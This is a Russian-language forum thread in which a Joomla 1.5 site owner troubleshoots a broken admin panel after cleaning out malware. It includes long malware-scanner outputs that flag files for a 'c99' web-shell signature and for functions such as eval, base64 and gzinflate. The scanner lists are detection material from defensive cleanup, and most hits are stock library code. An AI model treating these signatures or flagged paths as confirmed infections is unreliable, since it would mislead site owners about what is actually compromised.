0 Пользователей и 1 Гость просматривают эту тему.
  • 33 Ответов
  • 12725 Просмотров
*

OLI4KA

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
после чистки от вирусов при входе в админ.палень недоступно горизонтальное меню, общие настройки вообще отсутствуют (по-крайней мере при переходе появляется сообщение, что "удаленный сервер или файл не найден", а при переходе в раздел "пользователи" появляется белый экран. Кнопки некликабельны. В чем может быть проблема? Может кто подскажет какие файлы просмотреть? пароли от локалки и БД сменила, а вот с адмикой проблема - при смене пароля выдает такой текст: Invalid Token и при входе в админку показывает, что там находится два человека, хотя доступ есть только у меня...это глюк системы или моя админка вовсе не моя?
Движок - Joomla 1.5.26
Расширения во время чистки все удалила
Шаблон сделан в Artisteer 3, но шаблон я тож удалила, т.к. там был BackDoor

« Последнее редактирование: 29.09.2013, 14:02:48 от OLI4KA »
*

draff

  • Гуру
  • 5090
  • 357 / 7
  • ищу работу
Перезалить файлы из дистра Joomla 1.5.26  , без  /installation
*

OLI4KA

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
Перезаливала, без толку!
*

OLI4KA

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
минут 30 назад я вообще в админку не смогла зайти. я ввожу логин/пароль, а мне выдает, что мол логин и пароль не совпадают...час от часу не легче...
*

draff

  • Гуру
  • 5090
  • 357 / 7
  • ищу работу
*

OLI4KA

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
Да. Сделать бэкап?
*

draff

  • Гуру
  • 5090
  • 357 / 7
  • ищу работу
Да. Сделать бэкап?
Сделать восстановление из бекапа, который нормально работал.
*

OLI4KA

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
Сделала восстановление, толку снова ноль...
*

OLI4KA

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
После Бэкапа проглана сайт через Site-Security и вот что он мне выдал:
Цитировать
public_html/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/jscripts/color_picker.js   c99   
public_html/plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/js/color_picker.js   c99   
public_html/plugins/editors/jce/tiny_mce/themes/advanced/js/color_picker.js   c99   
public_html/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/js/color_picker.js   c99   
plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/jscripts/color_picker.js   c99   
plugins/editors/tinymce/jscripts/tiny_mce/themes/advanced/js/color_picker.js   c99   
plugins/editors/jce/tiny_mce/themes/advanced/js/color_picker.js   c99   
media/editors/tinymce/jscripts/tiny_mce/themes/advanced/js/color_picker.js   c99
Цитировать

что это за животные и как с ними бороться?
*

wishlight

  • Живу я здесь
  • 4844
  • 284 / 1
  • 300 руб очень быстрый хостинг в ЕС
Наверно не дочистили. Явно ничего хорошего.
*

OLI4KA

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
я открываю файлы и ничего подозрительного не вижу...
*

draff

  • Гуру
  • 5090
  • 357 / 7
  • ищу работу
и вот что он мне выдал:
что это за животные и как с ними бороться?
В тех файлах сканер нашел строку с99 . Но по памяти- файлы нормальные.
Сверяй найденные файлы со стандартными.
Чисти кеш в админке.И руками в папке /cache
*

OLI4KA

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
Уф, доступ к админке восстановила, однако менюшка до сих пор неактивна...:(
*

OLI4KA

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
А как их сверить со стандартными, если у меня нет стандартных файлов...где мне их взять?
*

SmokerMan

  • Гуру
  • 5293
  • 720 / 26
да уж)
А как их сверить со стандартными, если у меня нет стандартных файлов...где мне их взять?
и это было написано после этого)
Перезаливала, без толку!

Взять последний дистрибутив можно на оф. сайте http://www.joomla.org/announcements/release-news/5419-joomla-1526-released.html

я открываю файлы и ничего подозрительного не вижу...
а вы знаете как выглядит вредоносный код?)
*

OLI4KA

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
а вы знаете как выглядит вредоносный код?)
Я их столько видела за последнюю неделю (чистила сайт вручную), что наверное уже знаю.

Чисти кеш в админке.И руками в папке /cache
Меню админки для меня неактивно, соответственно и почистить кэш я там не могу.
А в папке cache кроме файлов .htaccess и index.html ничего нет, по-крайней мере левых файлов точно нет.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Цитировать
Меню админки для меня неактивно, соответственно и почистить кэш я там не могу.
конфликт скриптов или где то еще вирус есть
*

draff

  • Гуру
  • 5090
  • 357 / 7
  • ищу работу

А в папке cache кроме файлов .htaccess и index.html ничего нет, по-крайней мере левых файлов точно нет.
И что там в ? -> .htaccess
*

OLI4KA

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
конфликт скриптов или где то еще вирус есть
Как устранить конфликт или вообще как его найти и устранить?

Насчет вируса - Sity-Security выдает вот такие сигнатуры:
Цитировать
cli/finder_indexer.php   @set_time_limit(0)   
cli/finder_indexer.php   set_time_limit(0)   
plugins/content/emailcloak/emailcloak.php   preg_match(   
plugins/content/pagebreak/pagebreak.php   preg_replace   
plugins/content/pagebreak/pagebreak.php   stripslashes   
plugins/content/geshi/geshi.php   preg_replace   
plugins/content/geshi/geshi/geshi.php   preg_match(     
plugins/content/geshi/geshi/geshi.php   preg_replace   
plugins/captcha/recaptcha/recaptcha.php   stripslashes   
plugins/geshi.php   preg_replace   
plugins/phpinfo.php   base64   
plugins/phpinfo.php   IFRAME   
plugins/system/legacy/functions.php   stripslashes     
plugins/system/legacy/adminmenus.php   preg_match(   
plugins/system/sef/sef.php   preg_replace   
plugins/system/sef.php   preg_replace   
plugins/system/cache.php   preg_replace   
plugins/system/debug/debug.php   preg_replace     
plugins/system/debug.php   preg_replace   
plugins/system/languagecode/languagecode.php   preg_replace   
plugins/system/highlight/highlight.php   base64   
plugins/editors/tinymce/jscripts/tiny_mce/tiny_mce_gzip.php   preg_replace     
plugins/editors/jce/tiny_mce/plugins/imgmanager_ext/classes/phpthumb/phpthumb.class.php               base64   
plugins/editors/jce/tiny_mce/plugins/imgmanager_ext/classes/phpthumb/phpthumb.class.php               $_POST     
plugins/editors/jce/tiny_mce/plugins/imgmanager_ext/classes/phpthumb/phpthumb.functions.php   base64   
plugins/editors/jce/tiny_mce/plugins/imgmanager_ext/classes/phpthumb/phpthumb.functions.php   phpinfo()   
plugins/xmlrpc/blogger.php   preg_match(   
plugins/xmlrpc/blogger.php   preg_replace   
plugins/xmlrpc/joomla.php   preg_match(   
libraries/bitfolge/feedcreator.php   document.write(   
libraries/bitfolge/feedcreator.php   preg_match(   
libraries/bitfolge/feedcreator.php   preg_replace   
libraries/phpxmlrpc/xmlrpc.php   base64   
libraries/phpxmlrpc/xmlrpc.php   eval(   
libraries/phpxmlrpc/xmlrpc.php   gzinflate(   
libraries/phpxmlrpc/xmlrpc.php   preg_match(   
libraries/phpxmlrpc/xmlrpc.php   preg_replace   
libraries/phpxmlrpc/compat/version_compare.php   preg_replace   
libraries/phpxmlrpc/xmlrpcs.php   base64   
libraries/phpxmlrpc/xmlrpcs.php   gzinflate(   
libraries/phpxmlrpc/xmlrpc_wrappers.php   base64     
libraries/joomla/filter/input.php   preg_match(   
libraries/joomla/filter/input.php   preg_replace   
libraries/joomla/filter/input.php   stripslashes     
libraries/joomla/filter/output.php   preg_replace   
libraries/joomla/filter/filterinput.php   preg_match(     
libraries/joomla/filter/filterinput.php   preg_replace   
libraries/joomla/filter/filterinput.php   stripslashes   
libraries/joomla/filter/filteroutput.php   preg_replace   
libraries/joomla/methods.php   preg_match(   
libraries/joomla/methods.php   preg_replace   
libraries/joomla/filesystem/archive/gzip.php   gzinflate(     
libraries/joomla/filesystem/archive/zip.php   gzinflate(     
libraries/joomla/filesystem/path.php   preg_replace     
libraries/joomla/filesystem/folder.php   preg_match(   
libraries/joomla/filesystem/folder.php   preg_replace   
libraries/joomla/filesystem/file.php   preg_replace     
libraries/joomla/registry/format/ini.php   preg_match(   
libraries/joomla/access/access.php   preg_replace   
libraries/joomla/document/document.php   preg_replace   
libraries/joomla/document/html/html.php   eval(   
libraries/joomla/document/opensearch/opensearch.php   base64   
libraries/joomla/document/feed/renderer/rss.php              preg_replace     
libraries/joomla/document/feed/renderer/atom.php              preg_replace   
libraries/joomla/html/html.php                                     preg_replace   
libraries/joomla/html/html/string.php   preg_replace   
libraries/joomla/html/html/email.php   document.write(     
libraries/joomla/html/html/list.php                     preg_match(   
libraries/joomla/html/toolbar/button/confirm.php   confirm(   
libraries/joomla/html/parameter/element/filelist.php   preg_match(   
libraries/joomla/html/parameter/element/folderlist.php   preg_match(   
libraries/joomla/html/parameter/element/modulelayouts.php   preg_replace   
libraries/joomla/html/parameter/element/componentlayouts.php   preg_replace   
libraries/joomla/log/entry.php   preg_replace   
libraries/joomla/application/router.php             preg_replace   
libraries/joomla/application/module/helper.php   preg_replace   
libraries/joomla/application/web/webclient.php   preg_match(   
libraries/joomla/application/daemon.php             preg_replace
libraries/joomla/application/input/files.php            tmp_name   
libraries/joomla/application/input/cli.php   preg_match(   
libraries/joomla/application/web.php   preg_match(   
libraries/joomla/application/application.php   preg_match(     
libraries/joomla/application/component/model.php         preg_match(   
libraries/joomla/application/component/model.php         preg_replace     
libraries/joomla/application/component/helper.php         preg_replace   
libraries/joomla/application/component/controller.php   preg_match(     
libraries/joomla/application/component/controller.php   preg_replace     
libraries/joomla/application/component/view.php           preg_match(     
libraries/joomla/application/component/view.php           preg_replace   
libraries/joomla/application/component/controllerform.php         preg_match(   
libraries/joomla/application/component/controllerform.php        preg_replace   
libraries/joomla/application/component/controlleradmin.php        preg_match(   
libraries/joomla/application/cli.php                             getcwd()   
libraries/joomla/updater/update.php                             eval(   
libraries/joomla/updater/update.php                      preg_match(   
libraries/joomla/updater/adapters/extension.php           eval(   
libraries/joomla/updater/adapters/extension.php           preg_match(   
libraries/joomla/updater/adapters/collection.php           eval(   
libraries/joomla/updater/adapters/collection.php           preg_match(     
libraries/joomla/cache/controller/page.php               stripslashes   
libraries/joomla/cache/storage/file.php   preg_replace   
libraries/joomla/cache/storage/memcache.php   stripslashes   
libraries/joomla/cache/handler/page.php             stripslashes   
libraries/joomla/cache/controller.php              preg_replace   
libraries/joomla/cache/cache.php                    preg_replace   
libraries/joomla/cache/storage.php              preg_replace   
libraries/joomla/utilities/simplexml.php   eval(   
libraries/joomla/utilities/arrayhelper.php   preg_match(     
libraries/joomla/utilities/arrayhelper.php   preg_replace     
libraries/joomla/utilities/date.php              preg_match(   
libraries/joomla/utilities/compat/php50x.php   eval(     
libraries/joomla/installer/adapters/file.php     preg_replace   
libraries/joomla/form/field.php                    preg_replace   
libraries/joomla/form/rule.php         preg_match(   
libraries/joomla/form/fields/filelist.php   preg_match(   
libraries/joomla/form/fields/filelist.php   preg_replace   
libraries/joomla/form/fields/folderlist.php   preg_match(   
libraries/joomla/form/fields/folderlist.php   preg_replace   
libraries/joomla/form/fields/user.php   base64   
libraries/joomla/form/fields/componentlayout.php      preg_replace   
libraries/joomla/form/fields/radio.php                 preg_replace   
libraries/joomla/form/fields/groupedlist.php   preg_replace   
libraries/joomla/form/fields/list.php               preg_replace   
libraries/joomla/form/fields/modulelayout.php   preg_replace   
libraries/joomla/form/rules/tel.php               preg_match(   
libraries/joomla/form/rules/tel.php                     preg_replace   
libraries/joomla/form/form.php                    preg_match(   
libraries/joomla/form/form.php              preg_replace   
libraries/joomla/language/help.php   preg_match(   
libraries/joomla/language/language.php   preg_replace   
libraries/joomla/database/database.php   preg_match(   
libraries/joomla/database/database.php   preg_replace   
libraries/joomla/database/table.php   preg_replace   
libraries/joomla/database/table/user.php               preg_match(   
libraries/joomla/database/database/mysqlimporter.php   preg_replace     
libraries/joomla/database/database/mysqlexporter.php   preg_replace   
libraries/joomla/database/database/mysqli.php              preg_replace   
libraries/joomla/database/database/sqlsrv.php   preg_replace   
libraries/joomla/database/database/sqlsrv.php   stripslashes   
libraries/joomla/database/database/mysql.php   preg_replace     
libraries/joomla/mail/helper.php                          preg_match(   
libraries/joomla/mail/helper.php                          preg_replace   
libraries/joomla/session/storage/memcache.php   stripslashes   
libraries/joomla/image/image.php                       preg_match(   
libraries/joomla/image/image.php                         preg_replace   
libraries/joomla/plugin/helper.php                           preg_replace   
libraries/joomla/user/helper.php                            base64   
libraries/joomla/user/helper.php                          preg_replace   
libraries/joomla/client/ftp.php                            preg_match(   
libraries/joomla/client/ftp.php                               preg_replace   
libraries/joomla/client/ldap.php                                  base64   
libraries/joomla/environment/uri.php                         preg_match(   
libraries/joomla/environment/uri.php                          preg_replace   
libraries/joomla/environment/request.php                           $_POST   
libraries/joomla/environment/request.php                            stripslashes   
libraries/joomla/environment/browser.php                             preg_match(   
libraries/joomla/string/string.php                                          preg_match(   
libraries/joomla/string/string.php                                      preg_replace   
libraries/joomla/string/normalise.php                         preg_replace     
libraries/joomla/http/transport/socket.php                         preg_match(   
libraries/joomla/http/transport/stream.php                            preg_match(   
libraries/joomla/http/transport/curl.php                               preg_match(     
libraries/phputf8/ucwords.php   preg_replace   
libraries/phputf8/strcspn.php   preg_match(   
libraries/phputf8/strcspn.php   preg_replace   
libraries/phputf8/native/core.php                preg_match(   
libraries/phputf8/strspn.php   preg_match(   
libraries/phputf8/strspn.php   preg_replace   
libraries/phputf8/str_ireplace.php               preg_match(   
libraries/phputf8/str_split.php   preg_match(   
libraries/phputf8/trim.php                  preg_replace   
libraries/phputf8/stristr.php   preg_match(   
libraries/phputf8/utils/validation.php   preg_match(   
libraries/phputf8/utils/bad.php   preg_match(   
libraries/phputf8/utils/ascii.php   preg_match(   
libraries/phputf8/utils/specials.php   preg_match(   
libraries/phputf8/utils/specials.php   preg_replace   
libraries/phputf8/ucfirst.php   preg_match(   
libraries/pear/PEAR.php                        eval(   
libraries/phpinputfilter/inputfilter.php   preg_match(   
libraries/phpinputfilter/inputfilter.php   preg_replace   
libraries/phpinputfilter/inputfilter.php   stripslashes   
libraries/phpmailer/phpmailer.php                         base64   
libraries/phpmailer/phpmailer.php                          preg_match(   
libraries/phpmailer/phpmailer.php                           preg_replace   
libraries/phpmailer/smtp.php                            base64   
libraries/tcpdf/html_entity_decode_php4.php   preg_replace     
libraries/tcpdf/tcpdf.php                               preg_match(   
libraries/tcpdf/tcpdf.php                                  stripslashes   
libraries/cms/schema/changeitemsqlsrv.php   preg_replace   
libraries/cms/schema/changeitemmysql.php   preg_replace   
libraries/cms/form/field/user.php                          base64   
libraries/pattemplate/patError.php   preg_match(     
libraries/pattemplate/patTemplate.php   preg_match(   
libraries/pattemplate/patTemplate.php                          preg_replace   
libraries/pattemplate/patTemplate/Compiler.php                preg_replace   
libraries/pattemplate/patTemplate/Reader/DB.php                 preg_match(   
libraries/pattemplate/patTemplate/Reader/File.php                 preg_match(     
libraries/pattemplate/patTemplate/Modifier/Dateformat.php        preg_match(   
libraries/pattemplate/patTemplate/Modifier/Expression.php             eval(   
libraries/pattemplate/patTemplate/Reader.php                    preg_match(   
libraries/pattemplate/patTemplate/Reader.php                   preg_replace   
libraries/pattemplate/patTemplate/Dump/Html.php                    preg_replace   
libraries/pattemplate/patTemplate/InputFilter/StripComments.php   preg_replace   
libraries/pattemplate/patTemplate/InputFilter/ShortModifiers.php   preg_replace   
libraries/pattemplate/patTemplate/Function/Strip.php                       preg_replace   
libraries/pattemplate/patTemplate/OutputFilter/StripWhitespace.php   preg_replace   
libraries/phpinfo.php                                                                base64   
libraries/phpinfo.php                                                                 IFRAME   
libraries/geshi/geshi.php                                                        preg_match(     
libraries/geshi/geshi.php                                                          preg_replace     
libraries/geshi/geshi/php-brief.php                                    base64   
libraries/geshi/geshi/php-brief.php   preg_replace   
libraries/geshi/geshi/php-brief.php   stripslashes   
libraries/geshi/geshi/php.php                base64   
libraries/geshi/geshi/php.php                eval(   
libraries/geshi/geshi/php.php                preg_replace   
libraries/geshi/geshi/php.php   stripslashes   
libraries/domit/php_http_proxy.php   base64   
libraries/domit/php_http_client_generic.php   base64   
libraries/domit/xml_domit_xpath.php   eval(   
libraries/domit/xml_domit_lite_parser.php   preg_replace   
libraries/domit/xml_domit_parser.php   preg_replace   
libraries/simplepie/idn/idna_convert.class.php   preg_match(     
libraries/simplepie/simplepie.php                         base64   
libraries/simplepie/simplepie.php                                gzinflate(   
libraries/simplepie/simplepie.php                      preg_match(     
libraries/simplepie/simplepie.php                         preg_replace   
libraries/openid/Auth/OpenID.php                           preg_match(   
libraries/openid/Auth/Yadis/XML.php                eval(   
libraries/openid/Auth/Yadis/PlainHTTPFetcher.php                     preg_match(   
libraries/openid/Auth/Yadis/Yadis.php                  preg_match(   
libraries/openid/Auth/Yadis/ParseHTML.php   preg_match(   
libraries/openid/Auth/Yadis/ParseHTML.php   preg_replace   
libraries/openid/Auth/Yadis/XRDS.php            preg_match(     
libraries/openid/Auth/Yadis/XRI.php                preg_replace   
libraries/openid/Auth/Yadis/ParanoidHTTPFetcher.php   preg_match(     
libraries/openid/Auth/Yadis/HTTPFetcher.php                preg_match(   
libraries/openid/Auth/OpenID/BigMath.php                     base64   
libraries/openid/Auth/OpenID/TrustRoot.php             preg_match(   
libraries/openid/Auth/OpenID/Nonce.php                     preg_match(   
libraries/openid/Auth/OpenID/Parse.php                      preg_match(   
libraries/openid/Auth/OpenID/Parse.php                           preg_replace   
libraries/openid/Auth/OpenID/Association.php                         base64   
libraries/openid/Auth/OpenID/Server.php                          base64   
libraries/openid/Auth/OpenID/URINorm.php   preg_match(   
libraries/openid/Auth/OpenID/URINorm.php   preg_replace   
libraries/openid/Auth/OpenID/FileStore.php   base64     
CHANGELOG.php                                                  preg_replace   
language/phpinfo.php                                           base64   
language/phpinfo.php                                             IFRAME   
logs/phpinfo.php                                             base64   
logs/phpinfo.php                                                     IFRAME   
backup/phpinfo.php                                     base64   
backup/phpinfo.php                          IFRAME   
components/com_banners/helpers/banner.php   preg_match(   
components/com_banners/models/banner.php   preg_match(   
components/com_contact/controller.php              preg_replace   
components/com_contact/controller.php   stripslashes   
components/com_contact/views/contact/view.html.php   base64   У
components/com_contact/controllers/contact.php   stripslashes   
components/com_weblinks/helpers/icon.php   base64   
components/com_weblinks/models/form.php   base64   
components/com_finder/views/search/tmpl/default_result.php   base64   У
components/com_finder/views/search/view.html.php   preg_replace   
components/com_user/controller.php   base64   
components/com_user/controller.php   preg_replace   
components/com_user/views/login/view.html.php   base64   
components/com_media/helpers/media.php              preg_match(   
components/com_content/helpers/icon.php                base64   
components/com_content/controller.php   base64   
components/com_content/views/category/tmpl/default_items.php         base64   
components/com_content/views/category/tmpl/default_articles.php   base64   
components/com_content/views/category/view.html.php   base64   
components/com_content/views/article/view.pdf.php   base64   
components/com_content/views/article/tmpl/pagebreak.php   preg_replace   
components/com_content/views/article/view.html.php   base64   
components/com_content/views/featured/tmpl/default_item.php   base64   
components/com_content/views/section/view.html.php   base64   
components/com_content/models/form.php                                 base64   
components/com_content/models/article.php   preg_match(   
components/com_content/controllers/article.php   base64   
components/phpinfo.php   base64   
components/phpinfo.php   IFRAME   
components/com_mailto/controller.php   $_POST   
components/com_mailto/views/mailto/view.html.php   
components/com_search/views/search/view.html.php   preg_replace   
components/com_wrapper/views/wrapper/tmpl/default.php   IFRAME   
components/com_users/views/login/tmpl/default_logout.php   base64   У
components/com_users/views/login/tmpl/default_login.php   base64   
components/com_users/models/login.php   base64   
components/com_users/controllers/user.php   base64   
components/com_users/controllers/reset.php   confirm(   
administrator/includes/toolbar.php   preg_replace   
administrator/includes/application.php   preg_replace   
administrator/includes/pcl/pclzip.lib.php   eval(   
administrator/includes/pcl/pclzip.lib.php   gzinflate(   
administrator/includes/pcl/pclzip.lib.php   preg_match(   
administrator/includes/pcl/zip.lib.php   eval(   
administrator/phpinfo.php   base64     
administrator/phpinfo.php   IFRAME   
administrator/language/ru-RU/ru-RU.localise.php                   preg_replace   
administrator/components/com_banners/helpers/banner.php   preg_match(   
administrator/components/com_banners/views/banner.php                    preg_match(   
administrator/components/com_contact/admin.contact.html.php   document.write(   
administrator/components/com_contact/tables/contact.php                        preg_match(   
administrator/components/com_weblinks/tables/weblink.php   preg_match(   
administrator/components/com_finder/helpers/indexer/helper.php                         preg_replace   
administrator/components/com_finder/helpers/indexer/token.php                 preg_match(   
administrator/components/com_finder/helpers/indexer/parser/html.php   preg_replace   
administrator/components/com_finder/helpers/indexer/parser/rtf.php   preg_replace   
administrator/components/com_finder/helpers/indexer/result.php                        preg_replace   
administrator/components/com_finder/helpers/indexer/stemmer/porter_en.php   preg_match(   
administrator/components/com_finder/helpers/indexer/stemmer/porter_en.php   preg_replace
administrator/components/com_finder/helpers/indexer/query.php                        preg_match(   
administrator/components/com_finder/helpers/indexer/query.php                   preg_replace   
administrator/components/com_finder/helpers/language.php                   preg_replace   
administrator/components/com_finder/views/filters/tmpl/default.php   confirm(   
administrator/components/com_finder/views/index/tmpl/default.php   confirm(   
administrator/components/com_finder/views/maps/tmpl/default.php   confirm(   
administrator/components/com_finder/models/fields/directories.php   preg_match(   
administrator/components/com_finder/controllers/indexer.json.php   @set_time_limit(0)   
administrator/components/com_finder/controllers/indexer.json.php   set_time_limit(0)   
administrator/components/com_finder/controllers/index.php   @set_time_limit(0)   
administrator/components/com_finder/controllers/index.php   set_time_limit(0)   
administrator/components/com_templates/models/template.php   base64   
administrator/components/com_templates/models/source.php   base64   
administrator/components/com_templates/controllers/source.php   base64   
administrator/components/com_templates/controllers/source.php   preg_match(   
administrator/components/com_installer/models/install.php   tmp_name   
administrator/components/com_modules/controller.php   stripslashes   
administrator/components/com_modules/views/preview/tmpl/default.php             document.write(   
administrator/components/com_modules/models/positions.php   preg_match(   
administrator/components/com_modules/models/positions.php   preg_replace   
administrator/components/com_modules/admin.modules.html.php                  document.write(   
administrator/components/com_modules/admin.modules.html.php                      stripslashes   
administrator/components/com_joomlaupdate/helpers/download.php   set_time_limit(0)   
administrator/components/com_joomlaupdate/models/default.php                   preg_replace   
administrator/components/com_joomlaupdate/restore.php                    base64   
administrator/components/com_joomlaupdate/restore.php                     eval(   
administrator/components/com_joomlaupdate/restore.php                    getcwd()   
administrator/components/com_joomlaupdate/restore.php                  gzinflate(   
administrator/components/com_joomlaupdate/restore.php                    $_POST   
administrator/components/com_joomlaupdate/restore.php                   preg_match(   
administrator/components/com_joomlaupdate/restore.php                    preg_replace   
administrator/components/com_joomlaupdate/restore.php                  stripslashes   
administrator/components/com_massmail/admin.massmail.php   stripslashes   
administrator/components/com_trash/admin.trash.html.php   confirm(   
administrator/components/com_trash/admin.trash.html.php   eval(   
administrator/components/com_config/models/component.php   preg_replace   
administrator/components/com_config/controllers/application.php                            stripslashes   
administrator/components/com_mtwmigrator/models/migrate.php                     preg_replace   
administrator/components/com_plugins/models/plugins.php   preg_match(   
administrator/components/com_media/helpers/media.php                    preg_match(   
administrator/components/com_media/helpers/media.php                     tmp_name   
administrator/components/com_media/views/images/tmpl/default.php   base64   
administrator/components/com_media/views/media/tmpl/default.php   base64   
administrator/components/com_media/controllers/file.json.php   base64   
administrator/components/com_media/controllers/file.json.php   tmp_name   
administrator/components/com_media/controllers/file.php                   base64   
administrator/components/com_media/controllers/file.php                  tmp_name   
administrator/components/com_checkin/admin.checkin.php   preg_match(   
administrator/components/com_login/models/login.php            base64   
administrator/components/com_content/helper.php                   preg_match(   
administrator/components/com_content/views/article/view.html.php   preg_replace   
administrator/components/com_content/admin.content.html.php   confirm(   
administrator/components/com_content/admin.content.html.php   document.write(   
administrator/components/com_content/admin.content.html.php   preg_replace   
administrator/components/com_content/tables/index.php                   eval(   
administrator/components/com_categories/helpers/index.php   eval(   
administrator/components/com_categories/admin.categories.html.php   document.write(   
administrator/components/com_admin/tmpl/sysinfo_config.php   preg_match(   
administrator/components/com_admin/tmpl/sysinfo_phpinfo.php   preg_replace   
administrator/components/com_admin/helpers/index.php                   eval(   
administrator/components/com_admin/views/sysinfo/tmpl/index.php   eval(   
administrator/components/com_admin/admin.admin.html.php   preg_match(   
administrator/components/com_admin/admin.admin.html.php   preg_replace   
administrator/components/com_admin/models/help.php   preg_match(   
administrator/components/com_admin/models/help.php   preg_replace   
administrator/components/com_admin/models/sysinfo.php                  preg_replace   
administrator/components/com_admin/controllers/index.php   eval(   
administrator/components/com_poll/views/poll/tmpl/index.php   eval(   
administrator/components/com_joomlapack/helpers/sajax.php   eval(   
administrator/components/com_joomlapack/helpers/sajax.php   $_POST   
administrator/components/com_joomlapack/helpers/sajax.php   preg_replace   
administrator/components/com_joomlapack/helpers/utils.php   preg_match(   
administrator/components/com_joomlapack/helpers/utils.php   preg_replace   
administrator/components/com_joomlapack/assets/scripts/index.php   eval(   
administrator/components/com_joomlapack/classes/abstract/enginearchiver.php   gzinflate(   
administrator/components/com_joomlapack/classes/misc/index.php   eval(   
administrator/components/com_joomlapack/classes/misc/unzip.php   gzinflate(   
administrator/components/com_joomlapack/classes/misc/unjpa.php   gzinflate(   
administrator/components/com_joomlapack/classes/misc/cryptography.php   base64
administrator/components/com_joomlapack/classes/engine/lister/index.php   eval(   
administrator/components/com_joomlapack/classes/engine/lister/default.php   preg_match(   
administrator/components/com_joomlapack/classes/engine/dumper/mysql-new.php   stripslashes   
administrator/components/com_joomlapack/classes/engine/dumper/default.php   stripslashes   
administrator/components/com_joomlapack/classes/core/utility/tables.php   base64   
administrator/components/com_joomlapack/classes/core/cube.php                 @error_reporting(0)   
administrator/components/com_joomlapack/classes/core/cube.php              error_reporting(0)   
administrator/components/com_joomlapack/views/buadmin/view.html.php   confirm(   
administrator/components/com_joomlapack/views/update/index.php   eval(   
administrator/components/com_joomlapack/views/browser/tmpl/index.php   eval(   
administrator/components/com_joomlapack/views/def/tmpl/index.php   eval(   
administrator/components/com_joomlapack/controllers/profiles.php   tmp_name   
administrator/components/com_masscontent/models/sections.php           $_POST   
administrator/components/com_masscontent/models/sections.php                    stripslashes   
administrator/components/com_masscontent/models/content.php                stripslashes   
administrator/components/com_masscontent/models/categories.php   $_POST   
administrator/components/com_masscontent/models/categories.php   stripslashes   
administrator/components/com_search/helpers/search.php   preg_replace   
administrator/components/com_xmap/extensions/com_resource.php   stripslashes   
administrator/components/com_xmap/extensions/com_jomres.php   stripslashes   
administrator/components/com_xmap/extensions/com_virtuemart.php   stripslashes   
administrator/components/com_xmap/classes/XmapConfig.php   stripslashes   
administrator/components/com_xmap/classes/XmapNav.php   preg_match(   
administrator/components/com_xmap/classes/XmapPlugins.php   preg_match(   
administrator/components/com_xmap/classes/XmapAdmin.php   eval(   
administrator/components/com_xmap/classes/XmapAdmin.php   stripslashes   
administrator/components/com_xmap/classes/XmapSitemap.php   stripslashes   
administrator/components/com_xmap/ajaxResponse.php                   $_POST   
administrator/components/com_languages/views/overrides/index.php   eval(   
administrator/components/com_users/helpers/html/users.php   preg_replace   
administrator/components/com_users/views/note/index.php   eval(   
administrator/components/com_users/views/users/tmpl/index.php                 eval(   
administrator/components/com_users/views/groups/tmpl/default.php   confirm(   
administrator/components/com_users/models/mail.php   stripslashes   
administrator/components/com_users/controllers/config.php   tmp_name   
administrator/components/com_menus/helpers/index.php   eval(   
administrator/components/com_menus/classes/ilink.php   preg_replace   
administrator/components/com_menus/views/items/view.html.php   preg_match(   
administrator/components/com_menus/views/menus/tmpl/default.php   eval(   
administrator/components/com_menus/models/item.php   preg_replace   
administrator/components/com_menus/controllers/item.php   base64   
administrator/templates/hathor/html/com_finder/filters/default.php   confirm(   
administrator/templates/hathor/html/com_finder/index/default.php      confirm(   
administrator/templates/hathor/html/com_finder/maps/default.php              confirm(   
administrator/templates/hathor/html/pagination.php                preg_replace   
administrator/templates/hathor/html/com_users/groups/default.php   confirm(   
administrator/templates/hathor/html/com_menus/menus/default.php   base64   
administrator/templates/hathor/html/com_menus/menus/default.php   confirm(   
administrator/modules/mod_menu/menu.php   preg_replace   
xmlrpc/phpinfo.php                                 base64   
xmlrpc/phpinfo.php                          IFRAME   
templates/beez5/html/com_content/category/blog_item.php   base64   
templates/beez5/html/com_content/category/default_articles.php   base64   
templates/beez5/html/com_content/featured/default_item.php   base64   
templates/ja_purity/ja_templatetools.php   preg_match(   
templates/ja_purity/ja_templatetools.php   preg_replace   
templates/system/offline.php                           base64   
templates/beez/html/mod_login/default.php               base64   
templates/beez/index.php   document.write(   
media/com_finder/css/index.php   eval(   
media/phpinfo.php             base64   
media/phpinfo.php           IFRAME   
media/system/swf/index.php             eval(   
media/editors/tinymce/jscripts/tiny_mce/plugins/iespell/index.php                 eval(   
media/editors/tinymce/jscripts/tiny_mce/plugins/autoresize/index.php   eval(   
media/editors/tinymce/jscripts/tiny_mce/plugins/layer/index.php              eval(   
media/editors/tinymce/jscripts/tiny_mce/plugins/advlink/js/functions.php         @error_reporting(0)
media/editors/tinymce/jscripts/tiny_mce/plugins/advlink/js/functions.php           base64   
media/editors/tinymce/jscripts/tiny_mce/plugins/advlink/js/functions.php            error_reporting(0)
media/editors/tinymce/jscripts/tiny_mce/plugins/advlink/js/functions.php              $_POST
media/editors/tinymce/jscripts/tiny_mce/plugins/advlink/js/functions.php               preg_match(
media/editors/tinymce/jscripts/tiny_mce/plugins/advlink/js/functions.php                preg_replace
media/editors/tinymce/jscripts/tiny_mce/plugins/advlink/js/functions.php                stripslashes
media/editors/tinymce/jscripts/tiny_mce/themes/advanced/index.php   eval(   
media/editors/tinymce/jscripts/tiny_mce/utils/index.php   eval(   
modules/mod_footer/index.php   eval(   
modules/mod_simpleform/simpleform.class.php   preg_match(   
modules/mod_simpleform/simpleform.class.php   preg_replace   
modules/mod_simpleform/simpleform.class.php   tmp_name   
modules/mod_simpleform/kcaptcha/kcaptcha.php                         preg_match(   
modules/mod_simpleform/engine.php   $_POST   
modules/mod_simpleform/engine.php   preg_match(   
modules/mod_simpleform/engine.php   stripslashes   
modules/mod_articles_category/helper.php                        preg_match(   
